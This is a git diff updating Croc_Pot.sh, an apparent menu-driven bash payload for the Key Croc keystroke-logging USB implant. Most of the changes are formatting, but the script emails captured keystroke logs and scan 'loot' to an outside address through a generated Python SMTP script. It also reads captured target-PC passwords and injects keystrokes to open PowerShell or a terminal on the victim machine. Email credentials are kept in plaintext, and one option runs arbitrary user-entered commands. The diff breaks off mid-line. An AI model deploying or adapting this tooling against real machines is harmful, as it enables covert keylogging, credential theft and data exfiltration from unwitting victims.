diff --git a/payloads/library/general/Croc_Pot/Croc_Pot.sh b/payloads/library/general/Croc_Pot/Croc_Pot.sh index cff8afa..abbf9ff 100644 --- a/payloads/library/general/Croc_Pot/Croc_Pot.sh +++ b/payloads/library/general/Croc_Pot/Croc_Pot.sh @@ -5,7 +5,7 @@ # Description: Send E-mail, Status of keycroc, Basic Nmap, TCPdump, Install payload, # SSH to HAK5 gear, Reverse ssh tunnel, and more # Author: Spywill -# Version: 1.5.9 +# Version: 1.6.7 # Category: Key Croc ## ## @@ -14,6 +14,8 @@ LINE=$(perl -e 'print "=" x 80,"\n"') LINE_=$(perl -e 'print "*" x 10,"\n"') LINE_A=$(perl -e 'print "-" x 15,"\n"') +#----Validate IP v4 or v6 address +validate_ip="^(((25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?))|((([0-9A-Fa-f]{1,4}:){7}([0-9A-Fa-f]{1,4}|:))|(([0-9A-Fa-f]{1,4}:){6}(:[0-9A-Fa-f]{1,4}|((25[0-5]|2[0-4]\d|1\d\d|[1-9]?\d)(\.(25[0-5]|2[0-4]\d|1\d\d|[1-9]?\d)){3})|:))|(([0-9A-Fa-f]{1,4}:){5}(((:[0-9A-Fa-f]{1,4}){1,2})|:((25[0-5]|2[0-4]\d|1\d\d|[1-9]?\d)(\.(25[0-5]|2[0-4]\d|1\d\d|[1-9]?\d)){3})|:))|(([0-9A-Fa-f]{1,4}:){4}(((:[0-9A-Fa-f]{1,4}){1,3})|((:[0-9A-Fa-f]{1,4})?:((25[0-5]|2[0-4]\d|1\d\d|[1-9]?\d)(\.(25[0-5]|2[0-4]\d|1\d\d|[1-9]?\d)){3}))|:))|(([0-9A-Fa-f]{1,4}:){3}(((:[0-9A-Fa-f]{1,4}){1,4})|((:[0-9A-Fa-f]{1,4}){0,2}:((25[0-5]|2[0-4]\d|1\d\d|[1-9]?\d)(\.(25[0-5]|2[0-4]\d|1\d\d|[1-9]?\d)){3}))|:))|(([0-9A-Fa-f]{1,4}:){2}(((:[0-9A-Fa-f]{1,4}){1,5})|((:[0-9A-Fa-f]{1,4}){0,3}:((25[0-5]|2[0-4]\d|1\d\d|[1-9]?\d)(\.(25[0-5]|2[0-4]\d|1\d\d|[1-9]?\d)){3}))|:))|(([0-9A-Fa-f]{1,4}:){1}(((:[0-9A-Fa-f]{1,4}){1,6})|((:[0-9A-Fa-f]{1,4}){0,4}:((25[0-5]|2[0-4]\d|1\d\d|[1-9]?\d)(\.(25[0-5]|2[0-4]\d|1\d\d|[1-9]?\d)){3}))|:))|(:(((:[0-9A-Fa-f]{1,4}){1,7})|((:[0-9A-Fa-f]{1,4}){0,5}:((25[0-5]|2[0-4]\d|1\d\d|[1-9]?\d)(\.(25[0-5]|2[0-4]\d|1\d\d|[1-9]?\d)){3}))|:))))$" ## #----Create Croc_Pot folders ## @@ -28,8 +30,10 @@ fi green='\e[40;32m' blue='\e[40;34m' red='\e[40;31m' -white='\e[97m' +white='\e[40;97m' yellow='\e[40;93m' +pink="\e[40;35m" +cyan="\e[40;36m" clear='\e[0m' ## #----Color Functions @@ -49,61 +53,75 @@ ColorRed() { ## #----All Menu color Functions ## -MenuTitle() { +function MenuTitle() { echo -ne "\n\t\t\t\e[41;4;1m${*}${clear}\n" } -MenuColor() { - echo -ne "\t\t\t\e[40;1m${1}${clear}${green}->${clear}\e[40;38;5;202;4m${@:2}" +function MenuColor() { + local m_c='\e[40;38;5;202;4m' + echo -ne "\t\t\t\e[40;1m${2}${clear}${green}->${clear}" ; echo -ne "$(awk -v m=${1} '{printf("'${m_c}'%-'${1}'s\n", $0)}' <<< ${@:3})${clear}\n" } -MenuEnd() { - echo -ne "\t\t\t\e[40;1m0${clear}${green}->${clear}\e[40;4;32mEXIT ${array[3]} ${clear} -\t\t$(ColorBlue 'CHOOSE AN OPTION AND PRESS [ENTER]: ')" +function MenuEnd() { + unset chartCount + unset u_a unset m_a - read m_a + echo -ne "\t\t\t\e[40;1m0${clear}${green}->${clear}\e[40;4;32mEXIT $(awk -v m=${1} '{printf("%-'${1}'s'${clear}${green}${array[3]}' '${clear}'\n", $0)}' <<< ${green})\n" + echo -ne "\t\t\e[38;5;19;1;48;5;245mCHOOSE AN OPTION AND PRESS [ENTER]:${clear}" +while IFS= read -r -n1 -s u_a; do + case "$u_a" in + $'\0') + break ;; + $'\177') + if [ ${#m_a} -gt 0 ]; then + echo -ne "\b \b" + m_a=${m_a::-1} + fi ;; + *) + chartCount=$((chartCount+1)) + echo -ne "\e[48;5;202;30m${u_a}${clear}" + m_a+="$u_a";; + esac +done +echo -ne "\n" } -Info_Screen() { - echo -ne "\n\e[48;5;202;30m${LINE}${clear}\n${yellow}${*}\n\e[48;5;202;30m${LINE}${clear}\n" +## +#----Display info/how to +## +function Info_Screen() { + echo -ne "\n\e[48;5;202;30m${LINE}${clear}" | awk -v m=80 '{printf("%-80s\n", $0)}' + echo -ne "${1}" | awk -v m=80 '{printf("'${yellow}'%-80s'${clear}'\n", $0)}' | sed '1d' + echo -ne "\e[48;5;202;30m${LINE}${clear}" | awk -v m=80 '{printf("%-80s\n", $0)}' } ## #----Croc_Pot title function ## function croc_title() { + local k_b=$(awk -v m=24 '{printf("%-24s\n", $0)}' <<< $(lsusb | sed -n '/Linux Foundation\|Realtek Semiconductor/!p' | sed 's/^.*ID/ID/' | sed 's/ID//' | sed 's/,//' | awk '{print $1,$2}')) ## #----Test internet connection ## internet_test() { ping -q -c 1 -w 1 "8.8.8.8" &>"/dev/null" -if [[ "${?}" -ne 0 ]]; then - echo -ne "${red}Offline" +if [[ $? -ne 0 ]]; then + echo -ne "Offline" | awk -v m=10 '{printf("'${red}'%-10s\n", $0)}' elif [[ "${#args[@]}" -eq 0 ]]; then - echo -ne "${green}Online " -fi -} -## -#----Fill in space -## -FILL_IN() { -if [ "$(OS_CHECK)" = WINDOWS ]; then - echo -ne " " -elif [ "$(OS_CHECK)" = LINUX ]; then - echo -ne " " + echo -ne "Online" | awk -v m=10 '{printf("'${green}'%-10s\n", $0)}' fi } ## #----Croc_Pot title display info ## echo -ne "\n\n\e[41;38;5;232m${LINE}${clear} -${red}${LINE_A}${clear}\e[40m»${clear}${red}KEYCROC${clear}\e[40m-${clear}${red}HAK${clear}\e[40m${array[0]} ${clear}\e[40m«${clear}${red}---------${clear}\e[41;38;5;232m${array[1]}${clear}${yellow} $(hostname) IP: $(ifconfig wlan0 | grep "inet addr" | awk {'print $2'} | cut -c 6-) $(internet_test) ${clear} -${red} DEVELOPED BY ${clear}\e[40mSPYWILL ${clear}\e[40m ${clear}\e[41;38;5;232m§${clear}${yellow} $(hostname) VER: $(cat /root/udisk/version.txt) *TARGET-PC:${green}$(OS_CHECK)$(FILL_IN)${clear} -${red} DATE OF SCAN${clear}\e[40m $(date +%b-%d-%y---%r)${clear}\e[41;38;5;232mΩ${clear}${yellow} $(hostname) keyboard: $(sed -n 9p /root/udisk/config.txt) ${clear} -${red}${LINE_A}${clear}\e[40;92m»CROC_POT«${red}--${clear}${yellow}VER:1.5.9${red}---${clear}\e[41;38;5;232m${array[2]}${clear}${yellow} CPU TEMP:$(cat /sys/class/thermal/thermal_zone0/temp)°C USAGE:$(top -bn1 | grep "Cpu(s)" | sed "s/.*, *\([0-9.]*\)%* id.*/\1/" | awk '{print 100 - $1"%"}') MEM:$(free -m | awk 'NR==2{printf "%.2f%%", $3/$2*100 }') ${clear} +${green}»»»»»»»»»»»» CROC_POT ««««««««${clear}${yellow}VER:1.6.7${clear}${green}${clear}\e[41;38;5;232m${array[1]}${clear}${yellow} $(hostname) IP: $(awk -v m=20 '{printf("%-20s\n", $0)}' <<< $(ifconfig wlan0 | grep "inet addr" | awk {'print $2'} | cut -c 6-))${clear}$(internet_test)${clear} +${blue}DEVELOPED BY ${clear}${yellow}SPYWILL${clear}${cyan} $(awk -v m=16 '{printf("%-16s\n", $0)}' <<< $(uptime -p | sed 's/up/UP:/g' | sed 's/hours/hr/g' | sed 's/hour/hr/g' | sed 's/,//g' | sed 's/minutes/min/g' | sed 's/minute/min/g'))${clear}\e[41;38;5;232m§${clear}${yellow} $(hostname) VER: $(cat /root/udisk/version.txt) ${clear}${cyan}*${clear}${yellow}TARGET-PC:${clear}${green}$(awk -v m=10 '{printf("%-10s\n", $0)}' <<< $(OS_CHECK))${clear} +${blue}$(awk -v m=17 '{printf("%-17s\n", $0)}' <<< $(curl -Lsf --connect-timeout 2 --max-time 2 http://ip-api.com/line?fields=timezone))${clear}${cyan} $(date +%b-%d-%y-%r)${clear}\e[41;38;5;232mΩ${clear}${yellow} keyboard:${clear}${green}$(sed -n 9p /root/udisk/config.txt | sed 's/DUCKY_LANG //g' | sed -e 's/\(.*\)/\U\1/') ${clear}${yellow}ID:${clear}${green}${k_b}${clear} +\e[40;38;5;202m»»»»»»»»»»»» ${clear}${red}KEYCROC${clear}\e[40m-${clear}${red}HAK${clear}\e[40m${array[0]}${clear}\e[40;38;5;202m «««««««««««««${clear}\e[41;38;5;232m${array[2]}${clear}${yellow} CPU TEMP:${clear}${cyan}$(cat /sys/class/thermal/thermal_zone0/temp)°C${clear}${yellow} USAGE:${clear}${cyan}$(awk -v m=6 '{printf("%-6s\n", $0)}' <<< $(top -bn1 | grep "Cpu(s)" | sed "s/.*, *\([0-9.]*\)%* id.*/\1/" | awk '{print 100 - $1"%"}'))${clear}${yellow}MEM:${clear}${cyan}$(awk -v m=8 '{printf("%-8s\n", $0)}' <<< $(free -m | awk 'NR==2{printf "%.2f%%", $3/$2*100 }'))${clear} \e[41;38;5;232m${LINE}${clear}\n\n" } ## #----Croc_Pot title for loot ## function croc_title_loot() { - echo -ne "\n${LINE}\n\t${LINE_A}>KEYCROC-HAK5<${LINE_A}\n\t\tDEVELOPED BY SPYWILL\n\t\tDATE OF SCAN-$(date +%b-%d-%y---%r)\n\t${LINE_A}>CROC_POT<${LINE_A}\n${LINE}\n\n" + echo -ne "\n${LINE}\n\t${LINE_A}>CROC_POT<${LINE_A}\n\t\tDEVELOPED BY SPYWILL\n\t\tDATE OF SCAN-$(date +%b-%d-%y---%r)\n\t${LINE_A}>KEYCROC-HAK5<${LINE_A}\n${LINE}\n\n" } ## #----Croc_Pot invalid entry @@ -114,11 +132,29 @@ function invalid_entry() { sleep 1 } ## -#----read user input +#----read user input/add color ## function read_all() { + unset chartCount + unset a_r unset r_a - echo -ne "${blue}${*}:${clear}"; read r_a + echo -ne "\e[38;5;19;1;48;5;245m${*}:${clear}" +while IFS= read -r -n1 -s a_r; do + case "$a_r" in + $'\0') + break ;; + $'\177') + if [ ${#r_a} -gt 0 ]; then + echo -ne "\b \b" + r_a=${r_a::-1} + fi ;; + *) + chartCount=$((chartCount+1)) + echo -ne "\e[48;5;202;30m${a_r}${clear}" + r_a+="$a_r" ;; + esac +done +echo -ne "\n" } ## #----Check for OS keycroc is pluged into usb @@ -156,7 +192,7 @@ fi 2> /dev/null ## #----Check for target pc passwd ## -target_pw() { +function target_pw() { if [ -e "/root/udisk/tools/Croc_Pot/Croc_unlock.txt.filtered" ]; then echo -ne "$(sed '$!d' /root/udisk/tools/Croc_Pot/Croc_unlock.txt.filtered)\n" else @@ -175,13 +211,106 @@ case $r_a in apt -y install ${1} ;; [nN] | [nN][oO]) echo -ne "\n$(ColorYellow 'Maybe next time')\n" - ${4} ;; + ${4} + clear ;; *) invalid_entry ; ${3} ;; esac fi } ## +#----Replace user input with Asterisk (*) +## +function user_input_passwd() { + unset password + unset chartCount + echo -ne "\e[38;5;19;1;48;5;245mENTER ${2} PASSWORD AND PRESS [ENTER]:${clear}" +while IFS= read -r -n1 -s char; do + case "$char" in +$'\0') + break ;; +$'\177') + if [ ${#password} -gt 0 ]; then + echo -ne "\b \b" + password=${password::-1} + fi ;; +*) + chartCount=$((chartCount+1)) + echo -ne "\e[48;5;202;30m*${clear}" + password+="$char" ;; + esac +done + echo $password >> ${1} + echo -ne "\n" +} +## +#----Start web brower on target pc +## +function start_web() { +if [ "$(OS_CHECK)" = WINDOWS ]; then + Q GUI d + Q GUI r + sleep 1 + Q STRING "powershell" + Q ENTER + sleep 2 + Q STRING "Start-Process ${1}; exit" + Q ENTER +else + case $HOST_CHECK in +raspberrypi) + Q GUI d + sleep 1 + Q STRING "LXTerminal" + Q ENTER + Q ENTER + sleep 1 + Q STRING "gio open ${1}; exit" + Q ENTER ;; +parrot) + Q ALT F2 + sleep 1 + Q STRING "mate-terminal" + Q ENTER + sleep 1 + Q STRING "gio open ${1}; exit" + Q ENTER ;; +*) + Q ALT F2 + sleep 1 + Q STRING "xterm" + Q ENTER + sleep 1 + Q STRING "gio open ${1}; exit" + Q ENTER ;; + esac +fi +} +## +#----display Countdown in minute and seconds +## +function Countdown() { + min=${1} + sec=${2} + echo -ne "${green}" +while [ $min -ge 0 ]; do + while [ $sec -ge 0 ]; do + if [ "$min" -eq "0" ] && [ "$sec" -le "59" ]; then + echo -ne "${yellow}" + fi + if [ "$min" -eq "0" ] && [ "$sec" -le "10" ]; then + echo -ne "${red}" + fi + echo -ne "$(printf "%02d" $min):$(printf "%02d" $sec)\033[0K\r" + let "sec=sec-1" + sleep 1 + done + sec=59 + let "min=min-1" +done + echo -ne "${clear}" +} +## #----KeyCroc Log mean/function ## function croc_logs_mean() { @@ -189,15 +318,15 @@ function croc_logs_mean() { LED B croc_title MenuTitle KEYCROC LOG MENU -echo -ne "\t\t" ; MenuColor 1 MESSAGES LOG | tr -d '\t' ; echo -ne " ${clear}" ; MenuColor 8 AUTH LOG | tr -d '\t' ; echo -ne " ${clear}\n" -echo -ne "\t\t" ; MenuColor 2 KERNEL LOG | tr -d '\t' ; echo -ne " ${clear}" ; MenuColor 9 DMESG LOG | tr -d '\t' ; echo -ne " ${clear}\n" -echo -ne "\t\t" ; MenuColor 3 SYSTEM LOG | tr -d '\t' ; echo -ne " ${clear}" ; MenuColor 10 BOOTSTRAP LOG | tr -d '\t' ; echo -ne " ${clear}\n" -echo -ne "\t\t" ; MenuColor 4 SYSSTAT LOG | tr -d '\t' ; echo -ne " ${clear}" ; MenuColor 11 ALTERNATIVES LOG | tr -d '\t' ; echo -ne "${clear}\n" -echo -ne "\t\t" ; MenuColor 5 DEBUG LOG | tr -d '\t' ; echo -ne " ${clear}" ; MenuColor 12 MAIL INFO LOG | tr -d '\t' ; echo -ne " ${clear}\n" -echo -ne "\t\t" ; MenuColor 6 DPKG LOG | tr -d '\t' ; echo -ne " ${clear}" ; MenuColor 13 DAEMON LOG | tr -d '\t' ; echo -ne " ${clear}\n" -echo -ne "\t\t" ; MenuColor 7 NTPSTATS LOG | tr -d '\t' ; echo -ne " ${clear}" ; MenuColor 14 KEYSTROKES LOG | tr -d '\t' ; echo -ne " ${clear}\n" -MenuColor 15 RETURN TO MAIN MENU ; echo -ne "${clear}\n" -MenuEnd +echo -ne "\t\t" ; MenuColor 19 1 MESSAGES LOG | tr -d '\t\n' ; MenuColor 20 8 AUTH LOG | tr -d '\t' +echo -ne "\t\t" ; MenuColor 19 2 KERNEL LOG | tr -d '\t\n' ; MenuColor 20 9 DMESG LOG | tr -d '\t' +echo -ne "\t\t" ; MenuColor 19 3 SYSTEM LOG | tr -d '\t\n' ; MenuColor 19 10 BOOTSTRAP LOG | tr -d '\t' +echo -ne "\t\t" ; MenuColor 19 4 SYSSTAT LOG | tr -d '\t\n' ; MenuColor 19 11 ALTERNATIVES LOG | tr -d '\t' +echo -ne "\t\t" ; MenuColor 19 5 DEBUG LOG | tr -d '\t\n' ; MenuColor 19 12 MAIL INFO LOG | tr -d '\t' +echo -ne "\t\t" ; MenuColor 19 6 DPKG LOG | tr -d '\t\n' ; MenuColor 19 13 DAEMON LOG | tr -d '\t' +echo -ne "\t\t" ; MenuColor 19 7 NTPSTATS LOG | tr -d '\t\n' ; MenuColor 19 14 KEYSTROKES LOG | tr -d '\t' +MenuColor 19 15 RETURN TO MAIN MENU +MenuEnd 23 case $m_a in 1) croc_title_loot | tee ${LOOT_LOG} ; echo -e "\t${LINE_}MESSAGES_LOG${LINE_}\n" | tee -a ${LOOT_LOG} ; cat /var/log/messages | tee -a ${LOOT_LOG} ; croc_logs_mean ;; 2) croc_title_loot | tee ${LOOT_LOG} ; echo -e "\t${LINE_}KERNEL_LOG${LINE_}\n" | tee -a ${LOOT_LOG} ; cat /var/log/kern.log | tee -a ${LOOT_LOG} ; croc_logs_mean ;; @@ -227,62 +356,30 @@ function croc_mail() { local PYTHON_MAIL=/root/udisk/tools/Croc_Pot/Croc_Mail.py local USER_CR=/root/udisk/tools/Croc_Pot/user_email.txt LED B - echo -ne "$(Info_Screen '-Send E-Mail with gmail or OutLook + echo -ne "$(Info_Screen ' +-Send E-Mail with gmail or OutLook -Select gmail or outlook then Enter e-mail address -Enter e-mail password then Enter the e-mail to send to -Add MESSAGE and/or Add Attachment')\n\n" ## -#----User Smtp input Function +#----User Smtp Menu input Function ## user_smtp() { -MenuTitle SELECT EMAIL PROVIDER -MenuColor 1 GMAIL ; echo -ne " ${clear}\n" -MenuColor 2 OUTLOOK ; echo -ne " ${clear}\n" -MenuColor 3 RETURN TO MAIN MENU ; echo -ne " ${clear}\n" -MenuEnd +MenuTitle SELECT EMAIL PROVIDER ; MenuColor 19 1 GMAIL ; MenuColor 19 2 OUTLOOK ; MenuColor 19 3 RETURN TO MAIN MENU ; MenuEnd 22 case $m_a in - 1) local GMAIL=smtp.gmail.com ; echo ${GMAIL} >> ${USER_CR} ;; - 2) local OUTLOOK=smtp-mail.outlook.com ; echo ${OUTLOOK} >> ${USER_CR} ;; - 3) main_menu ;; - 0) exit 0 ;; - *) invalid_entry ; user_smtp ;; + 1) local GMAIL=smtp.gmail.com ; echo ${GMAIL} >> ${USER_CR} ;; 2) local OUTLOOK=smtp-mail.outlook.com ; echo ${OUTLOOK} >> ${USER_CR} ;; 3) main_menu ;; 0) exit 0 ;; [bB]) main_menu ;; *) invalid_entry ; user_smtp ;; esac } ## #----User E-mail input Function ## user_email_set() { -## -#----Replace user input with Asterisk (*) -## -user_input_passwd() { -unset password -unset chartCount -echo -n "$(ColorBlue 'ENTER E-MAIL PASSWORD AND PRESS [ENTER]:')" -while IFS= read -r -n1 -s char; do -case "$char" in -$'\0') - break ;; -$'\177') - if [ ${#password} -gt 0 ]; then - echo -ne "\b \b" - password=${password::-1} - fi ;; -*) - chartCount=$((chartCount+1)) - echo -n '*' - password+="$char" ;; -esac -done - echo $password >> ${USER_CR} - echo "" -} -read_all ENTER E-MAIL ADDRESS AND PRESS [ENTER] ; echo ${r_a} >> ${USER_CR} -user_input_passwd -read_all ENTER E-MAIL TO SEND LOOT TO AND PRESS [ENTER] ; echo ${r_a} >> ${USER_CR} + read_all ENTER E-MAIL ADDRESS AND PRESS [ENTER] ; echo ${r_a} >> ${USER_CR} + user_input_passwd ${USER_CR} E_MAIL + read_all ENTER E-MAIL TO SEND LOOT TO AND PRESS [ENTER] ; echo ${r_a} >> ${USER_CR} } ## -#----Python file send Function +#----Python send file variables to change between files ## mail_file() { clear @@ -298,7 +395,7 @@ python_v() { FILE_I_B="${CHANGE_FILE_A}" } ## -#----Mail all file Function +#----Mail Function user input to setup python file variables ## send_all_file() { if [ -e "${1}" ]; then @@ -312,10 +409,10 @@ else fi } ## -#----Mail Attachment Function +#----Mail user enter path to Attachment Function ## send_file_e() { -echo -ne "${blue}ENTER THE PATH TO ATTACHMENT AND PRESS [ENTER]:${clear}"; read s_a + read_all ENTER THE PATH TO ATTACHMENT AND PRESS [ENTER] ; s_a=${r_a} if [ -e "${s_a}" ]; then local CHANGE_FILE="P" local CHANGE_FILE_A="'${s_a}'" @@ -326,7 +423,7 @@ else fi } ## -#----Mail keystorkes Function +#----Mail send saved keystorkes file Function ## send_file_f() { local KEY_ST=/root/udisk/loot/croc_char.log @@ -342,48 +439,78 @@ fi ## #----Croc Mail Select File Menu ## -MenuTitle SELECT FILE TO E-MAIL -MenuColor 1 NMAP SCAN ; echo -ne " ${clear}\n" -MenuColor 2 KEYCROC LOG ; echo -ne " ${clear}\n" -MenuColor 3 WINDOW SCAN ; echo -ne " ${clear}\n" -MenuColor 4 KEYCROC INFO ; echo -ne " ${clear}\n" -MenuColor 5 ADD ATTACHMENT ; echo -ne " ${clear}\n" -MenuColor 6 KEYSTORKES LOG ; echo -ne " ${clear}\n" -MenuColor 7 RETURN TO MAIN MENU ; echo -ne " ${clear}\n" -MenuEnd +MenuTitle SELECT FILE TO E-MAIL ; MenuColor 19 1 NMAP SCAN ; MenuColor 19 2 KEYCROC LOG ; MenuColor 19 3 WINDOW SCAN ; MenuColor 19 4 KEYCROC INFO +MenuColor 19 5 ADD ATTACHMENT ; MenuColor 19 6 KEYSTORKES LOG ; MenuColor 19 7 RETURN TO MAIN MENU ; MenuEnd 22 case $m_a in - 1) send_all_file /root/udisk/loot/Croc_Pot/KeyCroc_NMAP.txt B NMAP SCAN nmap_menu ;; - 2) send_all_file /root/udisk/loot/Croc_Pot/KeyCroc_LOG.txt C KEYCROC LOG croc_logs_mean ;; - 3) send_all_file /root/udisk/loot/Croc_Pot/KeyCroc_Wind_LOG.txt D WINDOWS SCAN croc_pot_plus ;; - 4) send_all_file /root/udisk/loot/Croc_Pot/KeyCroc_INFO.txt E KEYCROC STATUS croc_status ;; - 5) send_file_e ;; - 6) send_file_f ;; - 7) main_menu ;; - 0) exit 0 ;; - *) invalid_entry ; mail_file ;; + 1) send_all_file /root/udisk/loot/Croc_Pot/KeyCroc_NMAP.txt B NMAP SCAN nmap_menu ;; 2) send_all_file /root/udisk/loot/Croc_Pot/KeyCroc_LOG.txt C KEYCROC LOG croc_logs_mean ;; 3) send_all_file /root/udisk/loot/Croc_Pot/KeyCroc_Wind_LOG.txt D WINDOWS SCAN croc_pot_plus ;; + 4) send_all_file /root/udisk/loot/Croc_Pot/KeyCroc_INFO.txt E KEYCROC STATUS croc_status ;; 5) send_file_e ;; 6) send_file_f ;; 7) main_menu ;; 0) exit 0 ;; *) invalid_entry ; mail_file ;; esac } ## -#----Python E-mail Function +#----Create Python E-mail file Function ## python_email() { rm ${PYTHON_MAIL} 2> /dev/null - sleep 1 echo -ne "import smtplib\nfrom email.mime.text import MIMEText\nfrom email.mime.multipart import MIMEMultipart\n from email.mime.base import MIMEBase\nfrom email import encoders\nimport os.path\n\nemail = '$(sed -n 2p ${USER_CR})'\npassword = '$(sed -n 3p ${USER_CR})'\nsend_to_email = '$(sed -n 4p ${USER_CR})'\n -subject = 'CROC_MAIL'\nmessage = '${r_a}${MY_MESS_A}'\n${FILE_A_B} ${FILE_I_B}\n +subject = 'CROC_MAIL'\nmessage = '${MY_MESS_A}'\n${FILE_A_B} ${FILE_I_B}\n msg = MIMEMultipart()\nmsg['From'] = email\nmsg['To'] = send_to_email\nmsg['Subject'] = subject\nmsg.attach(MIMEText(message, 'plain'))\n ${FILE_B_B}\n${FILE_C_B}\n${FILE_D_B}\n${FILE_E_B}\n${FILE_F_B}\n${FILE_G_B}\n ${FILE_H_B}\nserver = smtplib.SMTP('$(sed -n 1p ${USER_CR})', 587)\nserver.starttls()\nserver.login(email, password)\n text = msg.as_string()\nserver.sendmail(email, send_to_email, text)\nserver.quit()" >> ${PYTHON_MAIL} - sleep 1 python ${PYTHON_MAIL} } ## #----Mail check for existing email ## if [ -e "${USER_CR}" ]; then -echo -ne "${yellow}EXISTING E-MAIL${clear} ${green}$(sed -n 2p ${USER_CR})${clear}\n" +echo -ne "${yellow}EXISTING E-MAIL: ${clear}${green}$(sed -n 2p ${USER_CR})${clear}\n" +## +#----Mail check existing email for new messages gmail only +## +local check_gmail="$(sed -n 1p /root/udisk/tools/Croc_Pot/user_email.txt)" +if [[ "${check_gmail}" == "smtp.gmail.com" ]]; then +read_all CHECK E-MAIL FOR NEW MESSAGES Y/N AND PRESS [ENTER] +case $r_a in +[yY] | [yY][eE][sS]) + local USER="$(sed -n 2p /root/udisk/tools/Croc_Pot/user_email.txt)" + local PASS="$(sed -n 3p /root/udisk/tools/Croc_Pot/user_email.txt)" + local check_inbox=`echo wget -T 3 -t 1 -q --secure-protocol=TLSv1 --no-check-certificate \ --user=$USER --password=$PASS https://mail.google.com/mail/feed/atom -O -` + ${check_inbox} | while IFS=\> read -d \< E C; do +if [[ $E = "fullcount" ]] ; then + if [[ $C == 0 ]]; then + echo -ne "\n${yellow}No New Messages...${clear}\n" + break +else + echo -ne "\n${yellow}New Messages: ${clear}${green}$C${clear}\n" + echo -ne "${LINE}\n" + fi +fi +if [[ $E = "title" ]]; then + echo -ne "\n${LINE}\n$C" +fi +if [[ $E = "issued" ]]; then + echo " $C" +fi +if [[ $E = "summary" ]]; then + echo "$C [...]" +fi +if [[ $E = "name" ]]; then + echo " $C" +fi +if [[ $E = "email" ]]; then + echo " $C" +fi +done ;; +[nN] | [nN][oO]) + echo -ne "\n$(ColorYellow 'Maybe next time')\n" ;; +*) + invalid_entry ; croc_mail ;; +esac +fi +## +#----Mail keep/remove existing e-mail +## read_all USE EXISTING E-MAIL CREDENTIALS Y/N AND PRESS [ENTER] case $r_a in [yY] | [yY][eE][sS]) @@ -396,7 +523,7 @@ case $r_a in invalid_entry ; croc_mail ;; esac else - echo -ne "\n${LINE_}\e[5m$(ColorRed 'NO EXISTING E-MAIL CREDENTIALS WERE FOUND PLEASE ENTER E-MAIL CREDENTIALS')${LINE_}\n\n" + echo -ne "\n\e[5m$(ColorRed 'NO EXISTING E-MAIL CREDENTIALS WERE FOUND PLEASE ENTER E-MAIL CREDENTIALS')\n\n" user_smtp user_email_set fi @@ -408,10 +535,10 @@ case $r_a in [yY] | [yY][eE][sS]) unset MY_MESS_A unset DEF_MESS - read_all ENTER MESSAGE AND PRESS [ENTER] ;; + read_all ENTER MESSAGE AND PRESS [ENTER] ; MY_MESS_A=${r_a} ;; [nN] | [nN][oO]) unset r_a - local DEF_MESS=$(perl -e 'print "KEYCROC-HAK5---DEVELOPED BY SPYWILL ---Croc_Mail"') + local DEF_MESS=$(perl -e 'print "KEYCROC-HAK5---DEVELOPED BY SPYWILL---Croc_Mail"') local MY_MESS_A=${DEF_MESS} ;; *) invalid_entry ; croc_mail ;; @@ -419,7 +546,7 @@ esac ## #----Mail add attachment to email ## -echo -ne "${blue}ADD ATTACHMENT Y/N AND PRESS [ENTER]:${clear}"; read a_f + read_all ADD ATTACHMENT Y/N AND PRESS [ENTER] ; a_f=${r_a} case $a_f in [yY] | [yY][eE][sS]) mail_file ;; @@ -436,55 +563,52 @@ main_menu #----Croc pot plus menu/function ## function croc_pot_plus() { - LED B - croc_title ## #----Recon scan menu/Function ## -croc_recon() { - echo -ne "$(Info_Screen 'Perform some basic recon scan')\n" +function croc_recon() { + echo -ne "$(Info_Screen ' +-Perform some basic recon scan')\n" ## #----Recon Tcpdump Menu/Function ## tcpdump_scan() { - local LOOT_TCPDUMP=/root/udisk/loot/Croc_Pot/tcpdump.pcap - rm ${LOOT_TCPDUMP} - echo -ne "$(Info_Screen '-Start some basic Tcpdump scan and save to Loot/Croc_Pot folder + local LOOT_TCPDUMP=/root/udisk/loot/Croc_Pot/tcpdump.txt + echo -ne "$(Info_Screen ' +-Start some basic Tcpdump scan and save to Loot/Croc_Pot folder -PRESS CTRL + C TO STOP TCPDUMP SCAN')\n" -MenuTitle TCPDUMP SCAN MENU -MenuColor 1 INTERFACE SCAN ; echo -ne " ${clear}\n" -MenuColor 2 PACKETS IN HEX AND ASCll ; echo -ne " ${clear}\n" -MenuColor 3 PACKETS WITH IP ADDRESS ; echo -ne " ${clear}\n" -MenuColor 4 CURRENT NETWORK INTERFACE ; echo -ne " ${clear}\n" -MenuColor 5 ENTER AN TCPDUMP SCAN ; echo -ne " ${clear}\n" -MenuColor 6 RETURN TO MAIN MENU ; echo -ne " ${clear}\n" -MenuEnd +MenuTitle TCPDUMP SCAN MENU ; MenuColor 25 1 INTERFACE SCAN ; MenuColor 25 2 PACKETS IN HEX AND ASCll ; MenuColor 25 3 PACKETS WITH IP ADDRESS ; MenuColor 25 4 CURRENT NETWORK INTERFACE +MenuColor 25 5 CHECK HOST COMMUNICATION ; MenuColor 25 6 TCP PACKET HTTP REQUEST ; MenuColor 25 7 PACKET OF TCP,UDP,ICMP ; MenuColor 25 8 HOST HEADER HTTP ; MenuColor 25 9 DNS QUERY REQUEST +MenuColor 24 10 ENTER AN TCPDUMP SCAN ; MenuColor 24 11 RETURN TO MAIN MENU ; MenuEnd 28 case $m_a in - 1) tcpdump -D | tee ${LOOT_TCPDUMP} ; tcpdump_scan ;; - 2) tcpdump -XX -i any | tee ${LOOT_TCPDUMP} ; tcpdump_scan ;; - 3) tcpdump -n -i any | tee ${LOOT_TCPDUMP} ; tcpdump_scan ;; - 4) tcpdump | tee ${LOOT_TCPDUMP} ; tcpdump_scan ;; - 5) read_all ENTER TCPDUMP SCAN THEN PRESS [ENTER] && ${r_a} | tee ${LOOT_TCPDUMP} ; tcpdump_scan ;; - 6) main_menu ;; - 0) exit 0 ;; - [bB]) croc_recon ;; - *) invalid_entry ; tcpdump_scan ;; + 1) rm ${LOOT_TCPDUMP} 2> /dev/null ; croc_title_loot > ${LOOT_TCPDUMP} ; echo -e "\n\t${LINE_}INTERFACE SCAN${LINE_}\n" >> ${LOOT_TCPDUMP} ; tcpdump -D >> ${LOOT_TCPDUMP} ; cat ${LOOT_TCPDUMP} ; tcpdump_scan ;; + 2) rm ${LOOT_TCPDUMP} 2> /dev/null ; croc_title_loot > ${LOOT_TCPDUMP} ; echo -e "\n\t${LINE_}PACKETS 